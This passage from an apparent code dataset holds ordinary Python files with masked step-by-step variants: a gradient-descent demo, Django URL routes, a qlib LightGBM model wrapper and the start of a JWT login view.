suite_result_dto instance\n self.set_passed(suite_results_dict.get('passed'))\n self.set_failed(suite_results_dict.get('failed'))\n self.set_skipped(suite_results_dict.get('skipped'))\n self.set_error(suite_results_dict.get('error'))\n self.set_disabled(suite_results_dict.get('disabled'))\n self.set_duration_sec(execution_time)\n self.set_retries(suite_results_dict.get('reruns'))\n self.set_run(global_values.get(\"run\"))\n self.set_project(global_values.get(\"project\"))\n 
self.set_version(global_values.get(\"version\"))\n self.set_suite_custom_values(global_values.get(\"influxdb_values\"))\n\n self.merge_suite_result(global_values.get('merged'), influxdb_components,\n db_measurement_name_for_suite, global_values.get(\"run\"))\n\n return self\n\n def merge_suite_result(self, merged_enabled, influxdb_components, db_measurement_name_for_suite, run_id_value):\n # Merging the existing suite results with the suite_results from db for the same run\n # if 'merged' config value is True\n existing_suite_result = influxdb_components.get_results_by_run(db_measurement_name_for_suite, run_id_value)\n old_suite_list = list(existing_suite_result.get_points(measurement=f'{db_measurement_name_for_suite}'))\n if len(old_suite_list) != 0 and merged_enabled:\n old_suite_total_count = old_suite_list[0]['pass'] + old_suite_list[0]['fail'] + old_suite_list[0][\n 'skip']\n old_disabled_tests_count = old_suite_list[0]['disabled']\n self.set_passed(\n old_suite_total_count - self.__failed - self.__skipped)\n self.set_disabled(old_disabled_tests_count)\n influxdb_components.delete_results_by_run(db_measurement_name_for_suite, run_id_value)\n",
"step-ids": [
13,
14,
15,
16,
21
]
}
|
[
13,
14,
15,
16,
21
] |
# Minimal gradient-descent demo: minimise f(x) = x**c starting from x = 100.
n = 0.3  # learning rate
c = 2

def func(x):
    return x**c

def der_func(x):
    # Derivative of x**c with respect to x.
    return c * x**(c - 1)

def na_value(x):
    # One descent step: move x against the gradient.
    return x - n*der_func(x)

def main():
    x = 100
    v_min = func(x)
    for i in range(10):
        cur_v = func(x)
        x = na_value(x)
        if cur_v < v_min:
            v_min = cur_v
        print("----> ", i, " cur = ", cur_v, " x = ", x, " v_min = ", v_min)

main()
|
normal
|
{
"blob_id": "fa7246a4e7595393ca9aaec777fa85d782bb816e",
"index": 4815,
"step-1": "<mask token>\n\n\ndef func(x):\n return x ** c\n\n\ndef der_func(x):\n return c * x ** (c - 1)\n\n\n<mask token>\n\n\ndef main():\n x = 100\n v_min = func(x)\n for i in range(10):\n cur_v = func(x)\n x = na_value(x)\n if cur_v < v_min:\n v_min = cur_v\n print('----> ', i, ' cur = ', cur_v, ' x = ', x, ' v_min = ', v_min)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef func(x):\n return x ** c\n\n\ndef der_func(x):\n return c * x ** (c - 1)\n\n\ndef na_value(x):\n return x - n * der_func(x)\n\n\ndef main():\n x = 100\n v_min = func(x)\n for i in range(10):\n cur_v = func(x)\n x = na_value(x)\n if cur_v < v_min:\n v_min = cur_v\n print('----> ', i, ' cur = ', cur_v, ' x = ', x, ' v_min = ', v_min)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef func(x):\n return x ** c\n\n\ndef der_func(x):\n return c * x ** (c - 1)\n\n\ndef na_value(x):\n return x - n * der_func(x)\n\n\ndef main():\n x = 100\n v_min = func(x)\n for i in range(10):\n cur_v = func(x)\n x = na_value(x)\n if cur_v < v_min:\n v_min = cur_v\n print('----> ', i, ' cur = ', cur_v, ' x = ', x, ' v_min = ', v_min)\n\n\nmain()\n",
"step-4": "n = 0.3\nc = 2\n\n\ndef func(x):\n return x ** c\n\n\ndef der_func(x):\n return c * x ** (c - 1)\n\n\ndef na_value(x):\n return x - n * der_func(x)\n\n\ndef main():\n x = 100\n v_min = func(x)\n for i in range(10):\n cur_v = func(x)\n x = na_value(x)\n if cur_v < v_min:\n v_min = cur_v\n print('----> ', i, ' cur = ', cur_v, ' x = ', x, ' v_min = ', v_min)\n\n\nmain()\n",
"step-5": "\nn = 0.3\nc = 2\n\ndef func(x):\n return x**c \n\ndef der_func(x):\n return c * x**(c - 1)\n\ndef na_value(x):\n return x - n*der_func(x)\n\ndef main():\n x = 100\n v_min = func(x)\n for i in range(10):\n cur_v = func(x)\n x = na_value(x)\n if cur_v < v_min:\n v_min = cur_v\n print(\"----> \" ,i ,\" cur = \",cur_v,\" x = \",x,\" v_min = \" ,v_min )\n\n\nmain()",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
from django.conf.urls import url
from . import views
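# URL routes for the accounts app: index, login/logout, registration, attack and false-login views.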
urlpatterns = [
url(r'^$', views.index_view, name='accounts.index'),
url(r'^login/$', views.login_view, name='accounts.login'),
url(r'^logout/$', views.logout_view, name='accounts.logout'),
url(r'^registro/$', views.registro_usuario_view, name='accounts.registro'),
url(r'obrigado/(?P<username>[\w]+)/$', views.obrigado_view, name='accounts.obrigado'),
url(r'^ataque/$', views.ataque_view, name='accounts.ataque'),
url(r'^flpositivo/$', views.falsoLoginPositivo_view, name='accounts.flpositivo'),
url(r'^flnegativo/$', views.falsoLoginNegativo_view, name='accounts.flnegativo'),
]
|
normal
|
{
"blob_id": "b4d09b6d8ad5f0584f74adc0fd8116265bb6649b",
"index": 4641,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns = [url('^$', views.index_view, name='accounts.index'), url(\n '^login/$', views.login_view, name='accounts.login'), url('^logout/$',\n views.logout_view, name='accounts.logout'), url('^registro/$', views.\n registro_usuario_view, name='accounts.registro'), url(\n 'obrigado/(?P<username>[\\\\w]+)/$', views.obrigado_view, name=\n 'accounts.obrigado'), url('^ataque/$', views.ataque_view, name=\n 'accounts.ataque'), url('^flpositivo/$', views.falsoLoginPositivo_view,\n name='accounts.flpositivo'), url('^flnegativo/$', views.\n falsoLoginNegativo_view, name='accounts.flnegativo')]\n",
"step-3": "from django.conf.urls import url\nfrom . import views\nurlpatterns = [url('^$', views.index_view, name='accounts.index'), url(\n '^login/$', views.login_view, name='accounts.login'), url('^logout/$',\n views.logout_view, name='accounts.logout'), url('^registro/$', views.\n registro_usuario_view, name='accounts.registro'), url(\n 'obrigado/(?P<username>[\\\\w]+)/$', views.obrigado_view, name=\n 'accounts.obrigado'), url('^ataque/$', views.ataque_view, name=\n 'accounts.ataque'), url('^flpositivo/$', views.falsoLoginPositivo_view,\n name='accounts.flpositivo'), url('^flnegativo/$', views.\n falsoLoginNegativo_view, name='accounts.flnegativo')]\n",
"step-4": "from django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.index_view, name='accounts.index'),\n url(r'^login/$', views.login_view, name='accounts.login'),\n url(r'^logout/$', views.logout_view, name='accounts.logout'),\n url(r'^registro/$', views.registro_usuario_view, name='accounts.registro'),\n url(r'obrigado/(?P<username>[\\w]+)/$', views.obrigado_view, name='accounts.obrigado'),\n url(r'^ataque/$', views.ataque_view, name='accounts.ataque'),\n url(r'^flpositivo/$', views.falsoLoginPositivo_view, name='accounts.flpositivo'),\n url(r'^flnegativo/$', views.falsoLoginNegativo_view, name='accounts.flnegativo'),\n]\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from xai.brain.wordbase.adjectives._corporal import _CORPORAL
# class header
class _CORPORALS(_CORPORAL):
def __init__(self,):
_CORPORAL.__init__(self)
self.name = "CORPORALS"
self.specie = 'adjectives'
self.basic = "corporal"
self.jsondata = {}
|
normal
|
{
"blob_id": "d2787f17a46cf0db9aeea82f1b97ee8d630fd28a",
"index": 8932,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass _CORPORALS(_CORPORAL):\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass _CORPORALS(_CORPORAL):\n\n def __init__(self):\n _CORPORAL.__init__(self)\n self.name = 'CORPORALS'\n self.specie = 'adjectives'\n self.basic = 'corporal'\n self.jsondata = {}\n",
"step-4": "from xai.brain.wordbase.adjectives._corporal import _CORPORAL\n\n\nclass _CORPORALS(_CORPORAL):\n\n def __init__(self):\n _CORPORAL.__init__(self)\n self.name = 'CORPORALS'\n self.specie = 'adjectives'\n self.basic = 'corporal'\n self.jsondata = {}\n",
"step-5": "\n\nfrom xai.brain.wordbase.adjectives._corporal import _CORPORAL\n\n#calss header\nclass _CORPORALS(_CORPORAL, ):\n\tdef __init__(self,): \n\t\t_CORPORAL.__init__(self)\n\t\tself.name = \"CORPORALS\"\n\t\tself.specie = 'adjectives'\n\t\tself.basic = \"corporal\"\n\t\tself.jsondata = {}\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
import numpy as np
import pandas as pd
import lightgbm as lgb
from typing import List, Text, Tuple, Union
from ...model.base import ModelFT
from ...data.dataset import DatasetH
from ...data.dataset.handler import DataHandlerLP
from ...model.interpret.base import LightGBMFInt
from ...data.dataset.weight import Reweighter
from qlib.workflow import R
class LGBModel(ModelFT, LightGBMFInt):
"""LightGBM Model"""
def __init__(self, loss="mse", early_stopping_rounds=50, num_boost_round=1000, **kwargs):
if loss not in {"mse", "binary"}:
raise NotImplementedError
self.params = {"objective": loss, "verbosity": -1}
self.params.update(kwargs)
self.early_stopping_rounds = early_stopping_rounds
self.num_boost_round = num_boost_round
self.model = None
def _prepare_data(self, dataset: DatasetH, reweighter=None) -> List[Tuple[lgb.Dataset, str]]:
"""
The motivation of current version is to make validation optional
- train segment is necessary;
"""
ds_l = []
assert "train" in dataset.segments
for key in ["train", "valid"]:
if key in dataset.segments:
df = dataset.prepare(key, col_set=["feature", "label"], data_key=DataHandlerLP.DK_L)
if df.empty:
raise ValueError("Empty data from dataset, please check your dataset config.")
x, y = df["feature"], df["label"]
# Lightgbm need 1D array as its label
if y.values.ndim == 2 and y.values.shape[1] == 1:
y = np.squeeze(y.values)
else:
raise ValueError("LightGBM doesn't support multi-label training")
if reweighter is None:
w = None
elif isinstance(reweighter, Reweighter):
w = reweighter.reweight(df)
else:
raise ValueError("Unsupported reweighter type.")
ds_l.append((lgb.Dataset(x.values, label=y, weight=w), key))
return ds_l
def fit(
self,
dataset: DatasetH,
num_boost_round=None,
early_stopping_rounds=None,
verbose_eval=20,
evals_result=None,
reweighter=None,
**kwargs,
):
if evals_result is None:
evals_result = {} # in case of unsafety of Python default values
ds_l = self._prepare_data(dataset, reweighter)
ds, names = list(zip(*ds_l))
early_stopping_callback = lgb.early_stopping(
self.early_stopping_rounds if early_stopping_rounds is None else early_stopping_rounds
)
# NOTE: if you encounter error here. Please upgrade your lightgbm
verbose_eval_callback = lgb.log_evaluation(period=verbose_eval)
evals_result_callback = lgb.record_evaluation(evals_result)
self.model = lgb.train(
self.params,
ds[0], # training dataset
num_boost_round=self.num_boost_round if num_boost_round is None else num_boost_round,
valid_sets=ds,
valid_names=names,
callbacks=[early_stopping_callback, verbose_eval_callback, evals_result_callback],
**kwargs,
)
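        # Log every recorded eval metric to the active qlib recorder, one step per boosting round.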
for k in names:
for key, val in evals_result[k].items():
name = f"{key}.{k}"
for epoch, m in enumerate(val):
R.log_metrics(**{name.replace("@", "_"): m}, step=epoch)
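    # Inference over the requested data segment; returns predictions indexed like the prepared features.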
def predict(self, dataset: DatasetH, segment: Union[Text, slice] = "test"):
if self.model is None:
raise ValueError("model is not fitted yet!")
x_test = dataset.prepare(segment, col_set="feature", data_key=DataHandlerLP.DK_I)
return pd.Series(self.model.predict(x_test.values), index=x_test.index)
def finetune(self, dataset: DatasetH, num_boost_round=10, verbose_eval=20, reweighter=None):
"""
finetune model
Parameters
----------
dataset : DatasetH
dataset for finetuning
num_boost_round : int
number of round to finetune model
verbose_eval : int
verbose level
"""
# Based on existing model and finetune by train more rounds
dtrain, _ = self._prepare_data(dataset, reweighter) # pylint: disable=W0632
if dtrain.empty:
raise ValueError("Empty data from dataset, please check your dataset config.")
verbose_eval_callback = lgb.log_evaluation(period=verbose_eval)
self.model = lgb.train(
self.params,
dtrain,
num_boost_round=num_boost_round,
init_model=self.model,
valid_sets=[dtrain],
valid_names=["train"],
callbacks=[verbose_eval_callback],
)
|
normal
|
{
"blob_id": "d37187f067ddff94015e639a1759dddced817945",
"index": 6205,
"step-1": "<mask token>\n\n\nclass LGBModel(ModelFT, LightGBMFInt):\n <mask token>\n\n def __init__(self, loss='mse', early_stopping_rounds=50,\n num_boost_round=1000, **kwargs):\n if loss not in {'mse', 'binary'}:\n raise NotImplementedError\n self.params = {'objective': loss, 'verbosity': -1}\n self.params.update(kwargs)\n self.early_stopping_rounds = early_stopping_rounds\n self.num_boost_round = num_boost_round\n self.model = None\n\n def _prepare_data(self, dataset: DatasetH, reweighter=None) ->List[Tuple\n [lgb.Dataset, str]]:\n \"\"\"\n The motivation of current version is to make validation optional\n - train segment is necessary;\n \"\"\"\n ds_l = []\n assert 'train' in dataset.segments\n for key in ['train', 'valid']:\n if key in dataset.segments:\n df = dataset.prepare(key, col_set=['feature', 'label'],\n data_key=DataHandlerLP.DK_L)\n if df.empty:\n raise ValueError(\n 'Empty data from dataset, please check your dataset config.'\n )\n x, y = df['feature'], df['label']\n if y.values.ndim == 2 and y.values.shape[1] == 1:\n y = np.squeeze(y.values)\n else:\n raise ValueError(\n \"LightGBM doesn't support multi-label training\")\n if reweighter is None:\n w = None\n elif isinstance(reweighter, Reweighter):\n w = reweighter.reweight(df)\n else:\n raise ValueError('Unsupported reweighter type.')\n ds_l.append((lgb.Dataset(x.values, label=y, weight=w), key))\n return ds_l\n\n def fit(self, dataset: DatasetH, num_boost_round=None,\n early_stopping_rounds=None, verbose_eval=20, evals_result=None,\n reweighter=None, **kwargs):\n if evals_result is None:\n evals_result = {}\n ds_l = self._prepare_data(dataset, reweighter)\n ds, names = list(zip(*ds_l))\n early_stopping_callback = lgb.early_stopping(self.\n early_stopping_rounds if early_stopping_rounds is None else\n early_stopping_rounds)\n verbose_eval_callback = lgb.log_evaluation(period=verbose_eval)\n evals_result_callback = lgb.record_evaluation(evals_result)\n self.model = lgb.train(self.params, ds[0], num_boost_round=self.\n num_boost_round if num_boost_round is None else num_boost_round,\n valid_sets=ds, valid_names=names, callbacks=[\n early_stopping_callback, verbose_eval_callback,\n evals_result_callback], **kwargs)\n for k in names:\n for key, val in evals_result[k].items():\n name = f'{key}.{k}'\n for epoch, m in enumerate(val):\n R.log_metrics(**{name.replace('@', '_'): m}, step=epoch)\n <mask token>\n\n def finetune(self, dataset: DatasetH, num_boost_round=10, verbose_eval=\n 20, reweighter=None):\n \"\"\"\n finetune model\n\n Parameters\n ----------\n dataset : DatasetH\n dataset for finetuning\n num_boost_round : int\n number of round to finetune model\n verbose_eval : int\n verbose level\n \"\"\"\n dtrain, _ = self._prepare_data(dataset, reweighter)\n if dtrain.empty:\n raise ValueError(\n 'Empty data from dataset, please check your dataset config.')\n verbose_eval_callback = lgb.log_evaluation(period=verbose_eval)\n self.model = lgb.train(self.params, dtrain, num_boost_round=\n num_boost_round, init_model=self.model, valid_sets=[dtrain],\n valid_names=['train'], callbacks=[verbose_eval_callback])\n",
"step-2": "<mask token>\n\n\nclass LGBModel(ModelFT, LightGBMFInt):\n <mask token>\n\n def __init__(self, loss='mse', early_stopping_rounds=50,\n num_boost_round=1000, **kwargs):\n if loss not in {'mse', 'binary'}:\n raise NotImplementedError\n self.params = {'objective': loss, 'verbosity': -1}\n self.params.update(kwargs)\n self.early_stopping_rounds = early_stopping_rounds\n self.num_boost_round = num_boost_round\n self.model = None\n\n def _prepare_data(self, dataset: DatasetH, reweighter=None) ->List[Tuple\n [lgb.Dataset, str]]:\n \"\"\"\n The motivation of current version is to make validation optional\n - train segment is necessary;\n \"\"\"\n ds_l = []\n assert 'train' in dataset.segments\n for key in ['train', 'valid']:\n if key in dataset.segments:\n df = dataset.prepare(key, col_set=['feature', 'label'],\n data_key=DataHandlerLP.DK_L)\n if df.empty:\n raise ValueError(\n 'Empty data from dataset, please check your dataset config.'\n )\n x, y = df['feature'], df['label']\n if y.values.ndim == 2 and y.values.shape[1] == 1:\n y = np.squeeze(y.values)\n else:\n raise ValueError(\n \"LightGBM doesn't support multi-label training\")\n if reweighter is None:\n w = None\n elif isinstance(reweighter, Reweighter):\n w = reweighter.reweight(df)\n else:\n raise ValueError('Unsupported reweighter type.')\n ds_l.append((lgb.Dataset(x.values, label=y, weight=w), key))\n return ds_l\n\n def fit(self, dataset: DatasetH, num_boost_round=None,\n early_stopping_rounds=None, verbose_eval=20, evals_result=None,\n reweighter=None, **kwargs):\n if evals_result is None:\n evals_result = {}\n ds_l = self._prepare_data(dataset, reweighter)\n ds, names = list(zip(*ds_l))\n early_stopping_callback = lgb.early_stopping(self.\n early_stopping_rounds if early_stopping_rounds is None else\n early_stopping_rounds)\n verbose_eval_callback = lgb.log_evaluation(period=verbose_eval)\n evals_result_callback = lgb.record_evaluation(evals_result)\n self.model = lgb.train(self.params, ds[0], num_boost_round=self.\n num_boost_round if num_boost_round is None else num_boost_round,\n valid_sets=ds, valid_names=names, callbacks=[\n early_stopping_callback, verbose_eval_callback,\n evals_result_callback], **kwargs)\n for k in names:\n for key, val in evals_result[k].items():\n name = f'{key}.{k}'\n for epoch, m in enumerate(val):\n R.log_metrics(**{name.replace('@', '_'): m}, step=epoch)\n\n def predict(self, dataset: DatasetH, segment: Union[Text, slice]='test'):\n if self.model is None:\n raise ValueError('model is not fitted yet!')\n x_test = dataset.prepare(segment, col_set='feature', data_key=\n DataHandlerLP.DK_I)\n return pd.Series(self.model.predict(x_test.values), index=x_test.index)\n\n def finetune(self, dataset: DatasetH, num_boost_round=10, verbose_eval=\n 20, reweighter=None):\n \"\"\"\n finetune model\n\n Parameters\n ----------\n dataset : DatasetH\n dataset for finetuning\n num_boost_round : int\n number of round to finetune model\n verbose_eval : int\n verbose level\n \"\"\"\n dtrain, _ = self._prepare_data(dataset, reweighter)\n if dtrain.empty:\n raise ValueError(\n 'Empty data from dataset, please check your dataset config.')\n verbose_eval_callback = lgb.log_evaluation(period=verbose_eval)\n self.model = lgb.train(self.params, dtrain, num_boost_round=\n num_boost_round, init_model=self.model, valid_sets=[dtrain],\n valid_names=['train'], callbacks=[verbose_eval_callback])\n",
"step-3": "<mask token>\n\n\nclass LGBModel(ModelFT, LightGBMFInt):\n \"\"\"LightGBM Model\"\"\"\n\n def __init__(self, loss='mse', early_stopping_rounds=50,\n num_boost_round=1000, **kwargs):\n if loss not in {'mse', 'binary'}:\n raise NotImplementedError\n self.params = {'objective': loss, 'verbosity': -1}\n self.params.update(kwargs)\n self.early_stopping_rounds = early_stopping_rounds\n self.num_boost_round = num_boost_round\n self.model = None\n\n def _prepare_data(self, dataset: DatasetH, reweighter=None) ->List[Tuple\n [lgb.Dataset, str]]:\n \"\"\"\n The motivation of current version is to make validation optional\n - train segment is necessary;\n \"\"\"\n ds_l = []\n assert 'train' in dataset.segments\n for key in ['train', 'valid']:\n if key in dataset.segments:\n df = dataset.prepare(key, col_set=['feature', 'label'],\n data_key=DataHandlerLP.DK_L)\n if df.empty:\n raise ValueError(\n 'Empty data from dataset, please check your dataset config.'\n )\n x, y = df['feature'], df['label']\n if y.values.ndim == 2 and y.values.shape[1] == 1:\n y = np.squeeze(y.values)\n else:\n raise ValueError(\n \"LightGBM doesn't support multi-label training\")\n if reweighter is None:\n w = None\n elif isinstance(reweighter, Reweighter):\n w = reweighter.reweight(df)\n else:\n raise ValueError('Unsupported reweighter type.')\n ds_l.append((lgb.Dataset(x.values, label=y, weight=w), key))\n return ds_l\n\n def fit(self, dataset: DatasetH, num_boost_round=None,\n early_stopping_rounds=None, verbose_eval=20, evals_result=None,\n reweighter=None, **kwargs):\n if evals_result is None:\n evals_result = {}\n ds_l = self._prepare_data(dataset, reweighter)\n ds, names = list(zip(*ds_l))\n early_stopping_callback = lgb.early_stopping(self.\n early_stopping_rounds if early_stopping_rounds is None else\n early_stopping_rounds)\n verbose_eval_callback = lgb.log_evaluation(period=verbose_eval)\n evals_result_callback = lgb.record_evaluation(evals_result)\n self.model = lgb.train(self.params, ds[0], num_boost_round=self.\n num_boost_round if num_boost_round is None else num_boost_round,\n valid_sets=ds, valid_names=names, callbacks=[\n early_stopping_callback, verbose_eval_callback,\n evals_result_callback], **kwargs)\n for k in names:\n for key, val in evals_result[k].items():\n name = f'{key}.{k}'\n for epoch, m in enumerate(val):\n R.log_metrics(**{name.replace('@', '_'): m}, step=epoch)\n\n def predict(self, dataset: DatasetH, segment: Union[Text, slice]='test'):\n if self.model is None:\n raise ValueError('model is not fitted yet!')\n x_test = dataset.prepare(segment, col_set='feature', data_key=\n DataHandlerLP.DK_I)\n return pd.Series(self.model.predict(x_test.values), index=x_test.index)\n\n def finetune(self, dataset: DatasetH, num_boost_round=10, verbose_eval=\n 20, reweighter=None):\n \"\"\"\n finetune model\n\n Parameters\n ----------\n dataset : DatasetH\n dataset for finetuning\n num_boost_round : int\n number of round to finetune model\n verbose_eval : int\n verbose level\n \"\"\"\n dtrain, _ = self._prepare_data(dataset, reweighter)\n if dtrain.empty:\n raise ValueError(\n 'Empty data from dataset, please check your dataset config.')\n verbose_eval_callback = lgb.log_evaluation(period=verbose_eval)\n self.model = lgb.train(self.params, dtrain, num_boost_round=\n num_boost_round, init_model=self.model, valid_sets=[dtrain],\n valid_names=['train'], callbacks=[verbose_eval_callback])\n",
"step-4": "import numpy as np\nimport pandas as pd\nimport lightgbm as lgb\nfrom typing import List, Text, Tuple, Union\nfrom ...model.base import ModelFT\nfrom ...data.dataset import DatasetH\nfrom ...data.dataset.handler import DataHandlerLP\nfrom ...model.interpret.base import LightGBMFInt\nfrom ...data.dataset.weight import Reweighter\nfrom qlib.workflow import R\n\n\nclass LGBModel(ModelFT, LightGBMFInt):\n \"\"\"LightGBM Model\"\"\"\n\n def __init__(self, loss='mse', early_stopping_rounds=50,\n num_boost_round=1000, **kwargs):\n if loss not in {'mse', 'binary'}:\n raise NotImplementedError\n self.params = {'objective': loss, 'verbosity': -1}\n self.params.update(kwargs)\n self.early_stopping_rounds = early_stopping_rounds\n self.num_boost_round = num_boost_round\n self.model = None\n\n def _prepare_data(self, dataset: DatasetH, reweighter=None) ->List[Tuple\n [lgb.Dataset, str]]:\n \"\"\"\n The motivation of current version is to make validation optional\n - train segment is necessary;\n \"\"\"\n ds_l = []\n assert 'train' in dataset.segments\n for key in ['train', 'valid']:\n if key in dataset.segments:\n df = dataset.prepare(key, col_set=['feature', 'label'],\n data_key=DataHandlerLP.DK_L)\n if df.empty:\n raise ValueError(\n 'Empty data from dataset, please check your dataset config.'\n )\n x, y = df['feature'], df['label']\n if y.values.ndim == 2 and y.values.shape[1] == 1:\n y = np.squeeze(y.values)\n else:\n raise ValueError(\n \"LightGBM doesn't support multi-label training\")\n if reweighter is None:\n w = None\n elif isinstance(reweighter, Reweighter):\n w = reweighter.reweight(df)\n else:\n raise ValueError('Unsupported reweighter type.')\n ds_l.append((lgb.Dataset(x.values, label=y, weight=w), key))\n return ds_l\n\n def fit(self, dataset: DatasetH, num_boost_round=None,\n early_stopping_rounds=None, verbose_eval=20, evals_result=None,\n reweighter=None, **kwargs):\n if evals_result is None:\n evals_result = {}\n ds_l = self._prepare_data(dataset, reweighter)\n ds, names = list(zip(*ds_l))\n early_stopping_callback = lgb.early_stopping(self.\n early_stopping_rounds if early_stopping_rounds is None else\n early_stopping_rounds)\n verbose_eval_callback = lgb.log_evaluation(period=verbose_eval)\n evals_result_callback = lgb.record_evaluation(evals_result)\n self.model = lgb.train(self.params, ds[0], num_boost_round=self.\n num_boost_round if num_boost_round is None else num_boost_round,\n valid_sets=ds, valid_names=names, callbacks=[\n early_stopping_callback, verbose_eval_callback,\n evals_result_callback], **kwargs)\n for k in names:\n for key, val in evals_result[k].items():\n name = f'{key}.{k}'\n for epoch, m in enumerate(val):\n R.log_metrics(**{name.replace('@', '_'): m}, step=epoch)\n\n def predict(self, dataset: DatasetH, segment: Union[Text, slice]='test'):\n if self.model is None:\n raise ValueError('model is not fitted yet!')\n x_test = dataset.prepare(segment, col_set='feature', data_key=\n DataHandlerLP.DK_I)\n return pd.Series(self.model.predict(x_test.values), index=x_test.index)\n\n def finetune(self, dataset: DatasetH, num_boost_round=10, verbose_eval=\n 20, reweighter=None):\n \"\"\"\n finetune model\n\n Parameters\n ----------\n dataset : DatasetH\n dataset for finetuning\n num_boost_round : int\n number of round to finetune model\n verbose_eval : int\n verbose level\n \"\"\"\n dtrain, _ = self._prepare_data(dataset, reweighter)\n if dtrain.empty:\n raise ValueError(\n 'Empty data from dataset, please check your dataset config.')\n verbose_eval_callback = 
lgb.log_evaluation(period=verbose_eval)\n self.model = lgb.train(self.params, dtrain, num_boost_round=\n num_boost_round, init_model=self.model, valid_sets=[dtrain],\n valid_names=['train'], callbacks=[verbose_eval_callback])\n",
"step-5": "# Copyright (c) Microsoft Corporation.\n# Licensed under the MIT License.\n\nimport numpy as np\nimport pandas as pd\nimport lightgbm as lgb\nfrom typing import List, Text, Tuple, Union\nfrom ...model.base import ModelFT\nfrom ...data.dataset import DatasetH\nfrom ...data.dataset.handler import DataHandlerLP\nfrom ...model.interpret.base import LightGBMFInt\nfrom ...data.dataset.weight import Reweighter\nfrom qlib.workflow import R\n\n\nclass LGBModel(ModelFT, LightGBMFInt):\n \"\"\"LightGBM Model\"\"\"\n\n def __init__(self, loss=\"mse\", early_stopping_rounds=50, num_boost_round=1000, **kwargs):\n if loss not in {\"mse\", \"binary\"}:\n raise NotImplementedError\n self.params = {\"objective\": loss, \"verbosity\": -1}\n self.params.update(kwargs)\n self.early_stopping_rounds = early_stopping_rounds\n self.num_boost_round = num_boost_round\n self.model = None\n\n def _prepare_data(self, dataset: DatasetH, reweighter=None) -> List[Tuple[lgb.Dataset, str]]:\n \"\"\"\n The motivation of current version is to make validation optional\n - train segment is necessary;\n \"\"\"\n ds_l = []\n assert \"train\" in dataset.segments\n for key in [\"train\", \"valid\"]:\n if key in dataset.segments:\n df = dataset.prepare(key, col_set=[\"feature\", \"label\"], data_key=DataHandlerLP.DK_L)\n if df.empty:\n raise ValueError(\"Empty data from dataset, please check your dataset config.\")\n x, y = df[\"feature\"], df[\"label\"]\n\n # Lightgbm need 1D array as its label\n if y.values.ndim == 2 and y.values.shape[1] == 1:\n y = np.squeeze(y.values)\n else:\n raise ValueError(\"LightGBM doesn't support multi-label training\")\n\n if reweighter is None:\n w = None\n elif isinstance(reweighter, Reweighter):\n w = reweighter.reweight(df)\n else:\n raise ValueError(\"Unsupported reweighter type.\")\n ds_l.append((lgb.Dataset(x.values, label=y, weight=w), key))\n return ds_l\n\n def fit(\n self,\n dataset: DatasetH,\n num_boost_round=None,\n early_stopping_rounds=None,\n verbose_eval=20,\n evals_result=None,\n reweighter=None,\n **kwargs,\n ):\n if evals_result is None:\n evals_result = {} # in case of unsafety of Python default values\n ds_l = self._prepare_data(dataset, reweighter)\n ds, names = list(zip(*ds_l))\n early_stopping_callback = lgb.early_stopping(\n self.early_stopping_rounds if early_stopping_rounds is None else early_stopping_rounds\n )\n # NOTE: if you encounter error here. 
Please upgrade your lightgbm\n verbose_eval_callback = lgb.log_evaluation(period=verbose_eval)\n evals_result_callback = lgb.record_evaluation(evals_result)\n self.model = lgb.train(\n self.params,\n ds[0], # training dataset\n num_boost_round=self.num_boost_round if num_boost_round is None else num_boost_round,\n valid_sets=ds,\n valid_names=names,\n callbacks=[early_stopping_callback, verbose_eval_callback, evals_result_callback],\n **kwargs,\n )\n for k in names:\n for key, val in evals_result[k].items():\n name = f\"{key}.{k}\"\n for epoch, m in enumerate(val):\n R.log_metrics(**{name.replace(\"@\", \"_\"): m}, step=epoch)\n\n def predict(self, dataset: DatasetH, segment: Union[Text, slice] = \"test\"):\n if self.model is None:\n raise ValueError(\"model is not fitted yet!\")\n x_test = dataset.prepare(segment, col_set=\"feature\", data_key=DataHandlerLP.DK_I)\n return pd.Series(self.model.predict(x_test.values), index=x_test.index)\n\n def finetune(self, dataset: DatasetH, num_boost_round=10, verbose_eval=20, reweighter=None):\n \"\"\"\n finetune model\n\n Parameters\n ----------\n dataset : DatasetH\n dataset for finetuning\n num_boost_round : int\n number of round to finetune model\n verbose_eval : int\n verbose level\n \"\"\"\n # Based on existing model and finetune by train more rounds\n dtrain, _ = self._prepare_data(dataset, reweighter) # pylint: disable=W0632\n if dtrain.empty:\n raise ValueError(\"Empty data from dataset, please check your dataset config.\")\n verbose_eval_callback = lgb.log_evaluation(period=verbose_eval)\n self.model = lgb.train(\n self.params,\n dtrain,\n num_boost_round=num_boost_round,\n init_model=self.model,\n valid_sets=[dtrain],\n valid_names=[\"train\"],\n callbacks=[verbose_eval_callback],\n )\n",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
import os
from datetime import datetime, timedelta
from django.shortcuts import render
from django.utils.decorators import method_decorator
from rest_framework.viewsets import GenericViewSet, mixins
from common.jwt_util import generate_jwt
from .serializers import ApiUser, ApiUserSerializer, UserSerializer
from common.myresponse import StatusResponse
from rest_framework.generics import GenericAPIView
from .models import User
from common.utils.login_util import login_decorator
# Create your views here.
@method_decorator(login_decorator,name="list")
class UsersOptionsView(GenericViewSet, mixins.ListModelMixin):
"""
list:
返回用户列表
"""
serializer_class = ApiUserSerializer
queryset = User.objects.filter(is_superuser=0,is_active=1).all()
def list(self, request, *args, **kwargs):
return StatusResponse(data=super().list(request).data)
class UserLoginView(GenericAPIView):
def _generate_tokens(self, user_id, with_refresh_token=True):
"""
        Generate an access token and a refresh_token.
        :param user_id: user id
:return: token, refresh_token
"""
        # Issue the JWT
now = datetime.utcnow()
expiry = now + timedelta(hours=float(os.environ['JWT_EXPIRY_HOURS']))
token = generate_jwt({'user_id': user_id, 'refresh': False}, expiry)
refresh_token = None
if with_refresh_token:
